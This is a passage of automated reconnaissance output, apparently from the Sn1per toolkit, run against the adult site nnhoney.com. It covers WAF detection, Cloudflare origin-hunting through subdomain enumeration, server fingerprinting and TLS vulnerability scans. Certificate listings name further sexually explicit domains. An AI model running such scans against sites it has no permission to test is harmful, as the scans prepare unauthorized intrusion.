  4658.  + -- --=[Port 161 closed... skipping.
  4659.  + -- --=[Port 162 closed... skipping.
  4660.  + -- --=[Port 389 closed... skipping.
  4661.  + -- --=[Port 443 opened... running tests...
  4662.  + -- ----------------------------=[Checking for WAF]=------------------------ -- +
  4663.  
  4664.                                  ^     ^
  4665.         _   __  _   ____ _   __  _    _   ____
  4666.        ///7/ /.' \ / __////7/ /,' \ ,' \ / __/
  4667.       | V V // o // _/ | V V // 0 // 0 // _/
  4668.       |_n_,'/_n_//_/   |_n_,' \_,' \_,'/_/
  4669.                                 <
  4670.                                  ...'
  4671.  
  4672.     WAFW00F - Web Application Firewall Detection Tool
  4673.  
  4674.     By Sandro Gauci && Wendel G. Henrique
  4675.  
  4676. Checking https://nnhoney.com
  4677. The site https://nnhoney.com is behind a CloudFlare
  4678. Number of requests: 1
  4679.  
  4680.  + -- ----------------------------=[Checking Cloudflare]=--------------------- -- +
  4681.    ____ _                 _ _____     _ _
  4682.   / ___| | ___  _   _  __| |  ___|_ _(_) |
  4683.  | |   | |/ _ \| | | |/ _` | |_ / _` | | |
  4684.  | |___| | (_) | |_| | (_| |  _| (_| | | |
  4685.   \____|_|\___/ \__,_|\__,_|_|  \__,_|_|_|
  4686.     v1.0.1                      by m0rtem
  4687.  
  4688.  
  4689. [13:43:11] Initializing CloudFail - the date is: 22/12/2017  
  4690. [13:43:11] Fetching initial information from: nnhoney.com...  
  4691. [13:43:19] Server IP: 104.18.37.196  
  4692. [13:43:19] Testing if nnhoney.com is on the Cloudflare network...  
  4693. [13:43:19] nnhoney.com is part of the Cloudflare network!  
  4694. [13:43:19] Testing for misconfigured DNS using dnsdumpster...  
  4695. [13:43:29] Scanning crimeflare database...  
  4696. [13:43:30] Did not find anything.  
  4697. [13:43:30] Scanning 2897 subdomains (subdomains.txt), please wait...  
  4698. [13:48:20] 0.97% complete  
  4699. [13:55:50] 1.93% complete  
  4700. [14:03:20] 2.9% complete  
  4701. [14:10:51] 3.87% complete  
  4702. [14:18:21] 4.83% complete  
  4703. [14:25:52] 5.8% complete  
  4704. [14:33:22] 6.77% complete  
  4705. [14:40:53] 7.73% complete  
  4706. [14:48:23] 8.7% complete  
  4707. [14:55:54] 9.67% complete  
  4708. [15:03:24] 10.63% complete  
  4709. [15:10:54] 11.6% complete  
  4710. [15:18:25] 12.56% complete  
  4711. [15:25:55] 13.53% complete  
  4712. [15:33:25] 14.5% complete  
  4713. [15:40:56] 15.46% complete  
  4714. [15:48:26] 16.43% complete  
  4715. [15:55:56] 17.4% complete  
  4716. [16:03:27] 18.36% complete  
  4717. [16:10:57] 19.33% complete  
  4718. [16:18:27] 20.3% complete  
  4719. [16:25:58] 21.26% complete  
  4720. [16:33:28] 22.23% complete  
  4721. [16:40:58] 23.2% complete  
  4722. [16:48:28] 24.16% complete  
  4723. [16:55:59] 25.13% complete  
  4724. [17:03:29] 26.1% complete  
  4725. [17:11:01] 27.06% complete  
  4726. [17:18:31] 28.03% complete  
  4727. [17:26:01] 29.0% complete  
  4728. [17:33:32] 29.96% complete  
  4729. [17:39:10] [FOUND:SUBDOMAIN] ftp.nnhoney.com ON CLOUDFLARE NETWORK!  
  4730. [17:41:02] 30.93% complete  
  4731. [17:48:33] 31.9% complete  
  4732. [17:56:04] 32.86% complete  
  4733. [18:03:34] 33.83% complete  
  4734. [18:11:04] 34.79% complete  
  4735. [18:18:35] 35.76% complete  
  4736. [18:26:07] 36.73% complete  
  4737. [18:33:37] 37.69% complete  
  4738. [18:41:08] 38.66% complete  
  4739. [18:48:38] 39.63% complete  
  4740. [18:56:08] 40.59% complete  
  4741. [19:03:38] 41.56% complete  
  4742. [19:11:09] 42.53% complete  
  4743. [19:18:39] 43.49% complete  
  4744. [19:26:09] 44.46% complete  
  4745. [19:30:55] [FOUND:SUBDOMAIN] mail.nnhoney.com ON CLOUDFLARE NETWORK!  
  4746. [19:33:52] 45.43% complete  
  4747. [19:41:22] 46.39% complete  
  4748. [19:48:53] 47.36% complete  
  4749. [19:56:23] 48.33% complete  
  4750. [20:03:54] 49.29% complete  
  4751. [20:10:20] [FOUND:SUBDOMAIN] mysql.nnhoney.com ON CLOUDFLARE NETWORK!  
  4752. [20:11:25] 50.26% complete  
  4753. [20:18:55] 51.23% complete  
  4754. [20:26:26] 52.19% complete  
  4755. [20:33:57] 53.16% complete  
  4756. [20:41:27] 54.12% complete  
  4757. [20:48:58] 55.09% complete  
  4758. [20:56:28] 56.06% complete  
  4759. [21:03:59] 57.02% complete  
  4760. [21:11:32] 57.99% complete  
  4761. [21:19:02] 58.96% complete  
  4762. [21:26:33] 59.92% complete  
  4763. [21:34:03] 60.89% complete  
  4764. [21:41:34] 61.86% complete  
  4765. [21:49:05] 62.82% complete  
  4766. [21:56:35] 63.79% complete  
  4767. [22:04:06] 64.76% complete  
  4768. [22:11:36] 65.72% complete  
  4769. [22:19:06] 66.69% complete  
  4770. [22:26:36] 67.66% complete  
  4771. [22:34:06] 68.62% complete  
  4772. [22:41:37] 69.59% complete  
  4773. [22:49:07] 70.56% complete  
  4774. [22:56:37] 71.52% complete  
  4775. [23:04:08] 72.49% complete  
  4776. [23:11:38] 73.46% complete  
  4777. [23:19:09] 74.42% complete  
  4778. [23:26:39] 75.39% complete  
  4779. [23:34:09] 76.35% complete  
  4780. [23:41:39] 77.32% complete  
  4781. [23:49:09] 78.29% complete  
  4782. [23:56:39] 79.25% complete  
  4783. [00:04:10] 80.22% complete  
  4784. [00:11:41] 81.19% complete  
  4785. [00:19:11] 82.15% complete  
  4786. [00:26:42] 83.12% complete  
  4787. [00:34:12] 84.09% complete  
  4788. [00:41:42] 85.05% complete  
  4789. [00:49:12] 86.02% complete  
  4790. [00:56:42] 86.99% complete  
  4791. [01:04:13] 87.95% complete  
  4792. [01:11:43] 88.92% complete  
  4793. [01:19:13] 89.89% complete  
  4794. [01:26:44] 90.85% complete  
  4795. [01:34:14] 91.82% complete  
  4796. [01:41:53] 92.79% complete  
  4797. [01:49:23] 93.75% complete  
  4798. [01:56:53] 94.72% complete  
  4799. [02:01:52] [FOUND:SUBDOMAIN] www.nnhoney.com ON CLOUDFLARE NETWORK!  
  4800. [02:04:33] 95.69% complete  
  4801. [02:12:04] 96.65% complete  
  4802. [02:19:34] 97.62% complete  
  4803. [02:27:04] 98.58% complete  
  4804. [02:34:34] 99.55% complete  
  4805. [02:38:19] Scanning finished, we did not find anything sorry...  
  4806.  + -- ----------------------------=[Gathering HTTP Info]=--------------------- -- +
  4807. https://nnhoney.com [301 Moved Permanently] CloudFlare, Cookies[__cfduid,wfvt_1470590672], Country[UNITED STATES][US], HTTPServer[cloudflare], HttpOnly[__cfduid,wfvt_1470590672], IP[104.18.37.196], PHP[5.6.32], RedirectLocation[https://www.nnhoney.com/], UncommonHeaders[cf-ray], X-Powered-By[PHP/5.6.32]
  4808. https://www.nnhoney.com/ [200 OK] CloudFlare, Cookies[__cfduid,wfvt_1470590672], Country[UNITED STATES][US], HTML5, HTTPServer[cloudflare], HttpOnly[__cfduid,wfvt_1470590672], IP[104.18.36.196], JQuery[1.12.4], MetaGenerator[WordPress 4.9.1], Open-Graph-Protocol[website], PHP[5.6.32], Script[application/ld+json,text/javascript], Title[NN Honey - NN Teens Are The Best Teens], UncommonHeaders[link,cf-ray], WordPress[4.9.1], X-Powered-By[PHP/5.6.32]
  4809.  
  4810.  + -- ----------------------------=[Gathering SSL/TLS Info]=------------------ -- +
  4811.  
  4812.  
  4813.  
  4814.  AVAILABLE PLUGINS
  4815.  -----------------
  4816.  
  4817.   PluginOpenSSLCipherSuites
  4818.   PluginCertInfo
  4819.   PluginCompression
  4820.   PluginChromeSha1Deprecation
  4821.   PluginHSTS
  4822.   PluginSessionResumption
  4823.   PluginSessionRenegotiation
  4824.   PluginHeartbleed
  4825.  
  4826.  
  4827.  
  4828.  CHECKING HOST(S) AVAILABILITY
  4829.  -----------------------------
  4830.  
  4831.    nnhoney.com:443                     => 2400:cb00:2048:1::6812:24c4:443
  4832.  
  4833.  
  4834.  
  4835.  SCAN RESULTS FOR NNHONEY.COM:443 - 2400:CB00:2048:1::6812:24C4:443
  4836.  ------------------------------------------------------------------
  4837.  
  4838.   * Deflate Compression:
  4839.       OK - Compression disabled          
  4840.  
  4841.   * Session Renegotiation:
  4842.       Client-initiated Renegotiations:   OK - Rejected
  4843.       Secure Renegotiation:              OK - Supported
  4844.  
  4845.   * Certificate - Content:
  4846.       SHA1 Fingerprint:                  74d38f274be92e3a35f37ed9db2d7f1000db2f73
  4847.       Common Name:                       sni171563.cloudflaressl.com
  4848.       Issuer:                            COMODO ECC Domain Validation Secure Server CA 2
  4849.       Serial Number:                     6920BBFF258DEF4ABB52C8491D29F7E4
  4850.       Not Before:                        Nov 18 00:00:00 2017 GMT
  4851.       Not After:                         May 27 23:59:59 2018 GMT
  4852.       Signature Algorithm:               ecdsa-with-SHA256
  4853.       Public Key Algorithm:              id-ecPublicKey
  4854.       Key Size:                          256 bit
  4855.       X509v3 Subject Alternative Name:   {'DNS': ['sni171563.cloudflaressl.com', '*.acreativecouple.com', '*.agedbeauty.net', '*.bilalmatch.co.in', '*.discountefhotdshop.ga', '*.echtgeschickt.faith', '*.entre-coach.eu', '*.femdompleasures.com', '*.fncp.asia', '*.fuckyeahcosplay.com', '*.fuckyeahcurvygirls.com', '*.fuckyeahfitgirls.com', '*.getsugarinstant.com', '*.icrc-era-humanbridge.eu', '*.jina0mr.cf', '*.jnvand.in', '*.joyofincest.com', '*.justsexyteengirls.com', '*.lilithmedia.com', '*.m7likcmidou.gq', '*.nnhoney.com', '*.pricegfsalehotbest.cf', '*.primetush.com', '*.purennmodels.com', '*.servicecenterrijscholen.nl', '*.survivalnation.org', '*.tscraze.com', '*.wooddecor.club', 'acreativecouple.com', 'agedbeauty.net', 'bilalmatch.co.in', 'discountefhotdshop.ga', 'echtgeschickt.faith', 'entre-coach.eu', 'femdompleasures.com', 'fncp.asia', 'fuckyeahcosplay.com', 'fuckyeahcurvygirls.com', 'fuckyeahfitgirls.com', 'getsugarinstant.com', 'icrc-era-humanbridge.eu', 'jina0mr.cf', 'jnvand.in', 'joyofincest.com', 'justsexyteengirls.com', 'lilithmedia.com', 'm7likcmidou.gq', 'nnhoney.com', 'pricegfsalehotbest.cf', 'primetush.com', 'purennmodels.com', 'servicecenterrijscholen.nl', 'survivalnation.org', 'tscraze.com', 'wooddecor.club']}
  4856.  
  4857.   * Certificate - Trust:
  4858.       Hostname Validation:               OK - Subject Alternative Name matches
  4859.       Google CA Store (09/2015):         OK - Certificate is trusted
  4860.       Java 6 CA Store (Update 65):       OK - Certificate is trusted
  4861.       Microsoft CA Store (09/2015):      OK - Certificate is trusted
  4862.       Mozilla NSS CA Store (09/2015):    OK - Certificate is trusted
  4863.       Apple CA Store (OS X 10.10.5):     OK - Certificate is trusted
  4864.       Certificate Chain Received:        ['sni171563.cloudflaressl.com', 'COMODO ECC Domain Validation Secure Server CA 2', 'COMODO ECC Certification Authority']
  4865.  
  4866.   * Certificate - OCSP Stapling:
  4867.       OCSP Response Status:              successful
  4868.       Validation w/ Mozilla's CA Store:  OK - Response is trusted
  4869.       Responder Id:                      40096167F0BC83714FDE12082C6FD4D42B763D96
  4870.       Cert Status:                       good
  4871.       Cert Serial Number:                6920BBFF258DEF4ABB52C8491D29F7E4
  4872.       This Update:                       Dec 18 21:34:51 2017 GMT
  4873.       Next Update:                       Dec 25 21:34:51 2017 GMT
  4874.  
  4875.   * Session Resumption:
  4876.       With Session IDs:                  OK - Supported (5 successful, 0 failed, 0 errors, 5 total attempts).
  4877.       With TLS Session Tickets:          OK - Supported
  4878.  
  4879.   * SSLV2 Cipher Suites:
  4880.       Server rejected all cipher suites.
  4881.  
  4882.   * SSLV3 Cipher Suites:
  4883.       Server rejected all cipher suites.
  4884.  
  4885.  
  4886.  
  4887.  SCAN COMPLETED IN 8.64 S
  4888.  ------------------------
  4889. Version: 1.11.10-static
  4890. OpenSSL 1.0.2-chacha (1.0.2g-dev)
  4891. 
  4892. Testing SSL server nnhoney.com on port 443 using SNI name nnhoney.com
  4893.  
  4894.   TLS Fallback SCSV:
  4895. Server does not support TLS Fallback SCSV
  4896.  
  4897.   TLS renegotiation:
  4898. Secure session renegotiation supported
  4899.  
  4900.   TLS Compression:
  4901. Compression disabled
  4902.  
  4903.   Heartbleed:
  4904. TLS 1.2 not vulnerable to heartbleed
  4905. TLS 1.1 not vulnerable to heartbleed
  4906. TLS 1.0 not vulnerable to heartbleed
  4907.  
  4908.   Supported Server Cipher(s):
  4909. Preferred TLSv1.2  256 bits  ECDHE-ECDSA-CHACHA20-POLY1305 Curve P-256 DHE 256
  4910. Accepted  TLSv1.2  128 bits  ECDHE-ECDSA-AES128-GCM-SHA256 Curve P-256 DHE 256
  4911. Accepted  TLSv1.2  128 bits  ECDHE-ECDSA-AES128-SHA        Curve P-256 DHE 256
  4912. Accepted  TLSv1.2  128 bits  ECDHE-ECDSA-AES128-SHA256     Curve P-256 DHE 256
  4913. Accepted  TLSv1.2  256 bits  ECDHE-ECDSA-AES256-GCM-SHA384 Curve P-256 DHE 256
  4914. Accepted  TLSv1.2  256 bits  ECDHE-ECDSA-AES256-SHA        Curve P-256 DHE 256
  4915. Accepted  TLSv1.2  256 bits  ECDHE-ECDSA-AES256-SHA384     Curve P-256 DHE 256
  4916. Preferred TLSv1.1  128 bits  ECDHE-ECDSA-AES128-SHA        Curve P-256 DHE 256
  4917. Accepted  TLSv1.1  256 bits  ECDHE-ECDSA-AES256-SHA        Curve P-256 DHE 256
  4918. Preferred TLSv1.0  128 bits  ECDHE-ECDSA-AES128-SHA        Curve P-256 DHE 256
  4919. Accepted  TLSv1.0  256 bits  ECDHE-ECDSA-AES256-SHA        Curve P-256 DHE 256
  4920.  
  4921.   SSL Certificate:
  4922. Signature Algorithm: ecdsa-with-SHA256
  4923. Subject:  sni171563.cloudflaressl.com
  4924. Altnames: DNS:sni171563.cloudflaressl.com, DNS:*.acreativecouple.com, DNS:*.agedbeauty.net, DNS:*.bilalmatch.co.in, DNS:*.discountefhotdshop.ga, DNS:*.echtgeschickt.faith, DNS:*.entre-coach.eu, DNS:*.femdompleasures.com, DNS:*.fncp.asia, DNS:*.fuckyeahcosplay.com, DNS:*.fuckyeahcurvygirls.com, DNS:*.fuckyeahfitgirls.com, DNS:*.getsugarinstant.com, DNS:*.icrc-era-humanbridge.eu, DNS:*.jina0mr.cf, DNS:*.jnvand.in, DNS:*.joyofincest.com, DNS:*.justsexyteengirls.com, DNS:*.lilithmedia.com, DNS:*.m7likcmidou.gq, DNS:*.nnhoney.com, DNS:*.pricegfsalehotbest.cf, DNS:*.primetush.com, DNS:*.purennmodels.com, DNS:*.servicecenterrijscholen.nl, DNS:*.survivalnation.org, DNS:*.tscraze.com, DNS:*.wooddecor.club, DNS:acreativecouple.com, DNS:agedbeauty.net, DNS:bilalmatch.co.in, DNS:discountefhotdshop.ga, DNS:echtgeschickt.faith, DNS:entre-coach.eu, DNS:femdompleasures.com, DNS:fncp.asia, DNS:fuckyeahcosplay.com, DNS:fuckyeahcurvygirls.com, DNS:fuckyeahfitgirls.com, DNS:getsugarinstant.com, DNS:icrc-era-humanbridge.eu, DNS:jina0mr.cf, DNS:jnvand.in, DNS:joyofincest.com, DNS:justsexyteengirls.com, DNS:lilithmedia.com, DNS:m7likcmidou.gq, DNS:nnhoney.com, DNS:pricegfsalehotbest.cf, DNS:primetush.com, DNS:purennmodels.com, DNS:servicecenterrijscholen.nl, DNS:survivalnation.org, DNS:tscraze.com, DNS:wooddecor.club
  4925. Issuer:   COMODO ECC Domain Validation Secure Server CA 2
  4926.  
  4927. Not valid before: Nov 18 00:00:00 2017 GMT
  4928. Not valid after:  May 27 23:59:59 2018 GMT
  4929. 
  4930. ###########################################################
  4931.     testssl       2.9dev from https://testssl.sh/dev/
  4932. 
  4933.       This program is free software. Distribution and
  4934.              modification under GPLv2 permitted.
  4935.       USAGE w/o ANY WARRANTY. USE IT AT YOUR OWN RISK!
  4936.  
  4937.        Please file bugs @ https://testssl.sh/bugs/
  4938. 
  4939. ###########################################################
  4940.  
  4941.  Using "OpenSSL 1.0.2-chacha (1.0.2i-dev)" [~183 ciphers]
  4942.  on Kali:/usr/share/sniper/plugins/testssl.sh/bin/openssl.Linux.x86_64
  4943.  (built: "Jun 22 19:32:29 2016", platform: "linux-x86_64")
  4944.  
  4945.  
  4946. Testing all IPv4 addresses (port 443): 104.18.36.196 104.18.37.196
  4947. -----------------------------------------------------
  4948.  Start 2017-12-23 02:39:36        -->> 104.18.36.196:443 (nnhoney.com) <<--
  4949.  
  4950.  further IP addresses:   104.18.37.196 2400:cb00:2048:1::6812:25c4
  4951.                          2400:cb00:2048:1::6812:24c4
  4952.  rDNS (104.18.36.196):   --
  4953.  Service detected:       HTTP
  4954.  
  4955.  
  4956.  Testing protocols via sockets except SPDY+HTTP2 
  4957.  
  4958.  SSLv2      not offered (OK)
  4959.  SSLv3      not offered (OK)
  4960.  TLS 1      offered
  4961.  TLS 1.1    offered
  4962.  TLS 1.2    offered (OK)
  4963.  TLS 1.3    offered (OK): draft 18
  4964.  SPDY/NPN   h2, spdy/3.1, http/1.1 (advertised)
  4965.  HTTP2/ALPN h2, spdy/3.1, http/1.1 (offered)
  4966.  
  4967.  Testing ~standard cipher categories 
  4968.  
  4969.  NULL ciphers (no encryption)                  not offered (OK)
  4970.  Anonymous NULL Ciphers (no authentication)    not offered (OK)
  4971.  Export ciphers (w/o ADH+NULL)                 not offered (OK)
  4972.  LOW: 64 Bit + DES encryption (w/o export)     not offered (OK)
  4973.  Weak 128 Bit ciphers (SEED, IDEA, RC[2,4])    not offered (OK)
  4974.  Triple DES Ciphers (Medium)                   not offered (OK)
  4975.  High encryption (AES+Camellia, no AEAD)       offered (OK)
  4976.  Strong encryption (AEAD ciphers)              offered (OK)
  4977.  
  4978.  
  4979.  Testing robust (perfect) forward secrecy, (P)FS -- omitting Null Authentication/Encryption, 3DES, RC4 
  4980.  
  4981.  PFS is offered (OK)          TLS13-AES-256-GCM-SHA384
  4982.                               TLS13-CHACHA20-POLY1305-SHA256
  4983.                               ECDHE-ECDSA-CHACHA20-POLY1305-OLD
  4984.                               ECDHE-ECDSA-AES256-GCM-SHA384
  4985.                               ECDHE-ECDSA-AES256-SHA384 ECDHE-ECDSA-AES256-SHA
  4986.                               ECDHE-ECDSA-CHACHA20-POLY1305
  4987.                               TLS13-AES-128-GCM-SHA256
  4988.                               ECDHE-ECDSA-AES128-GCM-SHA256
  4989.                               ECDHE-ECDSA-AES128-SHA256 ECDHE-ECDSA-AES128-SHA
  4990.  Elliptic curves offered:     secp224r1 prime256v1 secp384r1 secp521r1 X25519
  4991.  
  4992.  
  4993.  Testing server preferences 
  4994.  
  4995.  Has server cipher order?     yes (OK)
  4996.  Negotiated protocol          TLSv1.3
  4997.  Negotiated cipher            TLS13-AES-256-GCM-SHA384, 253 bit ECDH (X25519)
  4998.  Cipher order
  4999.     TLSv1:     ECDHE-ECDSA-AES128-SHA ECDHE-ECDSA-AES256-SHA
  5000.     TLSv1.1:   ECDHE-ECDSA-AES128-SHA ECDHE-ECDSA-AES256-SHA
  5001.     TLSv1.2:   ECDHE-ECDSA-CHACHA20-POLY1305-OLD ECDHE-ECDSA-CHACHA20-POLY1305
  5002.                ECDHE-ECDSA-AES128-GCM-SHA256 ECDHE-ECDSA-AES128-SHA
  5003.                ECDHE-ECDSA-AES128-SHA256 ECDHE-ECDSA-AES256-GCM-SHA384
  5004.                ECDHE-ECDSA-AES256-SHA ECDHE-ECDSA-AES256-SHA384
  5005.     TLSv1.3:   TLS13-AES-256-GCM-SHA384 TLS13-CHACHA20-POLY1305-SHA256
  5006.                TLS13-AES-128-GCM-SHA256
  5007.  
  5008.  
  5009.  Testing server defaults (Server Hello) 
  5010.  
  5011.  TLS extensions (standard)    "renegotiation info/#65281" "server name/#0"
  5012.                               "session ticket/#35" "status request/#5"
  5013.                               "next protocol/#13172" "EC point formats/#11"
  5014.                               "extended master secret/#23"
  5015.                               "signed certificate timestamps/#18"
  5016.                               "application layer protocol negotiation/#16"
  5017.  Session Ticket RFC 5077 hint 64799 seconds, session tickets keys seems to be rotated < daily
  5018.  SSL Session ID support       yes
  5019.  Session Resumption           Tickets: yes, ID: yes
  5020.  TLS clock skew               -1 sec from localtime
  5021.  Signature Algorithm          ECDSA with SHA256
  5022.  Server key size              ECDSA 256 bits
  5023.  Fingerprint / Serial         SHA1 74D38F274BE92E3A35F37ED9DB2D7F1000DB2F73 / 6920BBFF258DEF4ABB52C8491D29F7E4
  5024.                               SHA256 B6B6FD5B1F8CD4B5334BBC9745638EDC3722ED3AF5B8640394D7930EE6D7ADCA
  5025.  Common Name (CN)             sni171563.cloudflaressl.com (request w/o SNI didn't succeed, usual for EC certificates)
  5026.  subjectAltName (SAN)         sni171563.cloudflaressl.com *.acreativecouple.com
  5027.                               *.agedbeauty.net *.bilalmatch.co.in
  5028.                               *.discountefhotdshop.ga *.echtgeschickt.faith
  5029.                               *.entre-coach.eu *.femdompleasures.com
  5030.                               *.fncp.asia *.fuckyeahcosplay.com
  5031.                               *.fuckyeahcurvygirls.com *.fuckyeahfitgirls.com
  5032.                               *.getsugarinstant.com *.icrc-era-humanbridge.eu
  5033.                               *.jina0mr.cf *.jnvand.in *.joyofincest.com
  5034.                               *.justsexyteengirls.com *.lilithmedia.com
  5035.                               *.m7likcmidou.gq *.nnhoney.com
  5036.                               *.pricegfsalehotbest.cf *.primetush.com
  5037.                               *.purennmodels.com *.servicecenterrijscholen.nl
  5038.                               *.survivalnation.org *.tscraze.com
  5039.                               *.wooddecor.club acreativecouple.com
  5040.                               agedbeauty.net bilalmatch.co.in
  5041.                               discountefhotdshop.ga echtgeschickt.faith
  5042.                               entre-coach.eu femdompleasures.com fncp.asia
  5043.                               fuckyeahcosplay.com fuckyeahcurvygirls.com
  5044.                               fuckyeahfitgirls.com getsugarinstant.com
  5045.                               icrc-era-humanbridge.eu jina0mr.cf jnvand.in
  5046.                               joyofincest.com justsexyteengirls.com
  5047.                               lilithmedia.com m7likcmidou.gq nnhoney.com
  5048.                               pricegfsalehotbest.cf primetush.com
  5049.                               purennmodels.com servicecenterrijscholen.nl
  5050.                               survivalnation.org tscraze.com wooddecor.club 
  5051.  Issuer                       COMODO ECC Domain Validation Secure Server CA 2 (COMODO CA Limited from GB)
  5052.  Trust (hostname)             Ok via SAN (SNI mandatory)
  5053.  Chain of trust               Ok   
  5054.  EV cert (experimental)       no
  5055.  Certificate Expiration       155 >= 60 days (2017-11-17 19:00 --> 2018-05-27 19:59 -0400)
  5056.  # of certificates provided   3
  5057.  Certificate Revocation List  http://crl.comodoca4.com/COMODOECCDomainValidationSecureServerCA2.crl
  5058.  OCSP URI                     http://ocsp.comodoca4.com
  5059.  OCSP stapling                offered
  5060.  OCSP must staple             no
  5061.  DNS CAA RR (experimental)    not offered
  5062.  Certificate Transparency     yes (TLS extension)
  5063.  
  5064.  
  5065.  Testing HTTP header response @ "/" 
  5066.  
  5067.  HTTP Status Code             301 Moved Permanently, redirecting to "https://www.nnhoney.com/"
  5068.  HTTP clock skew              0 sec from localtime
  5069.  Strict Transport Security    --
  5070.  Public Key Pinning           --
  5071.  Server banner                cloudflare
  5072.  Application banner           X-Powered-By(B: PHP/5(B.6(B.3(B2(B
  5073.  Cookie(s)                    2 issued: 1/2 secure, 2/2 HttpOnly -- maybe better try target URL of 30x
  5074.  Security headers             --
  5075.  Reverse Proxy banner         --
  5076.  
  5077.  
  5078.  Testing vulnerabilities 
  5079.  
  5080.  Heartbleed (CVE-2014-0160)                not vulnerable (OK), no heartbeat extension
  5081.  CCS (CVE-2014-0224)                       not vulnerable (OK)
  5082.  Ticketbleed (CVE-2016-9244), experiment.  not vulnerable (OK), no session tickets
  5083.  ROBOT                                     Server does not support any cipher suites that use RSA key transport
  5084.  Secure Renegotiation (CVE-2009-3555)      not vulnerable (OK)
  5085.  Secure Client-Initiated Renegotiation     not vulnerable (OK)
  5086.  CRIME, TLS (CVE-2012-4929)                not vulnerable (OK)
  5087.  BREACH (CVE-2013-3587)                    no HTTP compression (OK)  - only supplied "/" tested
  5088.  POODLE, SSL (CVE-2014-3566)               not vulnerable (OK)
  5089.  TLS_FALLBACK_SCSV (RFC 7507)              Downgrade attack prevention supported (OK)
  5090.  SWEET32 (CVE-2016-2183, CVE-2016-6329)    not vulnerable (OK)
  5091.  FREAK (CVE-2015-0204)                     not vulnerable (OK)
  5092.  DROWN (CVE-2016-0800, CVE-2016-0703)      not vulnerable on this host and port (OK)
  5093.                                            no RSA certificate, thus certificate can't be used with SSLv2 elsewhere
  5094.  LOGJAM (CVE-2015-4000), experimental      not vulnerable (OK): no DH EXPORT ciphers, no DH key detected
  5095.  BEAST (CVE-2011-3389)                     TLS1: ECDHE-ECDSA-AES128-SHA
  5096.                                                  ECDHE-ECDSA-AES256-SHA 
  5097.                                            VULNERABLE -- but also supports higher protocols (possible mitigation): TLSv1.1 TLSv1.2
  5098.  LUCKY13 (CVE-2013-0169), experimental     potentially VULNERABLE, uses cipher block chaining (CBC) ciphers with TLS
  5099.  RC4 (CVE-2013-2566, CVE-2015-2808)        no RC4 ciphers detected (OK)
  5100.  
  5101.  
  5102.  Testing 364 ciphers via OpenSSL plus sockets against the server, ordered by encryption strength 
  5103.  
  5104. Hexcode  Cipher Suite Name (OpenSSL)       KeyExch.   Encryption  Bits     Cipher Suite Name (RFC)
  5105. -----------------------------------------------------------------------------------------------------------------------------
  5106.  x1302   TLS13-AES-256-GCM-SHA384          ECDH 253   AESGCM      256      TLS_AES_256_GCM_SHA384                            
  5107.  xcc14   ECDHE-ECDSA-CHACHA20-POLY1305-OLD ECDH 256   ChaCha20    256      TLS_ECDHE_ECDSA_WITH_CHACHA20_POLY1305_SHA256_OLD  
  5108.  xc02c   ECDHE-ECDSA-AES256-GCM-SHA384     ECDH 256   AESGCM      256      TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384            
  5109.  xc024   ECDHE-ECDSA-AES256-SHA384         ECDH 256   AES         256      TLS_ECDHE_ECDSA_WITH_AES_256_CBC_SHA384            
  5110.  xc00a   ECDHE-ECDSA-AES256-SHA            ECDH 256   AES         256      TLS_ECDHE_ECDSA_WITH_AES_256_CBC_SHA              
  5111.  xcca9   ECDHE-ECDSA-CHACHA20-POLY1305     ECDH 253   ChaCha20    256      TLS_ECDHE_ECDSA_WITH_CHACHA20_POLY1305_SHA256      
  5112.  x1301   TLS13-AES-128-GCM-SHA256          ECDH 253   AESGCM      128      TLS_AES_128_GCM_SHA256                            
  5113.  xc02b   ECDHE-ECDSA-AES128-GCM-SHA256     ECDH 256   AESGCM      128      TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256            
  5114.  xc023   ECDHE-ECDSA-AES128-SHA256         ECDH 256   AES         128      TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA256            
  5115.  xc009   ECDHE-ECDSA-AES128-SHA            ECDH 256   AES         128      TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA              
  5116.  
  5117.  
  5118.  Running client simulations via sockets 
  5119.  
  5120.  Android 2.3.7                No connection
  5121.  Android 4.1.1                TLSv1.0 ECDHE-ECDSA-AES128-SHA, 256 bit ECDH (P-256)
  5122.  Android 4.3                  TLSv1.0 ECDHE-ECDSA-AES128-SHA, 256 bit ECDH (P-256)
  5123.  Android 4.4.2                TLSv1.2 ECDHE-ECDSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
  5124.  Android 5.0.0                TLSv1.2 ECDHE-ECDSA-CHACHA20-POLY1305-OLD, 256 bit ECDH (P-256)
  5125.  Android 6.0                  TLSv1.2 ECDHE-ECDSA-CHACHA20-POLY1305-OLD, 256 bit ECDH (P-256)
  5126.  Android 7.0                  TLSv1.2 ECDHE-ECDSA-CHACHA20-POLY1305, 253 bit ECDH (X25519)
  5127.  Chrome 51 Win 7              TLSv1.2 ECDHE-ECDSA-AES128-GCM-SHA256, 253 bit ECDH (X25519)
  5128.  Chrome 57 Win 7              TLSv1.3 TLS13-AES-128-GCM-SHA256, 253 bit ECDH (X25519)
  5129.  Firefox 49 Win 7             TLSv1.2 ECDHE-ECDSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
  5130.  Firefox 53 Win 7             TLSv1.3 TLS13-AES-128-GCM-SHA256, 253 bit ECDH (X25519)
  5131.  IE 6 XP                      No connection
  5132.  IE 7 Vista                   TLSv1.0 ECDHE-ECDSA-AES128-SHA, 256 bit ECDH (P-256)
  5133.  IE 8 XP                      No connection
  5134.  IE 8 Win 7                   TLSv1.0 ECDHE-ECDSA-AES128-SHA, 256 bit ECDH (P-256)
  5135.  IE 11 Win 7                  TLSv1.2 ECDHE-ECDSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
  5136.  IE 11 Win 8.1                TLSv1.2 ECDHE-ECDSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
  5137.  IE 11 Win Phone 8.1 Update   TLSv1.2 ECDHE-ECDSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
  5138.  IE 11 Win 10                 TLSv1.2 ECDHE-ECDSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
  5139.  Edge 13 Win 10               TLSv1.2 ECDHE-ECDSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
  5140.  Edge 13 Win Phone 10         TLSv1.2 ECDHE-ECDSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
  5141.  Opera 17 Win 7               TLSv1.2 ECDHE-ECDSA-AES128-SHA, 256 bit ECDH (P-256)
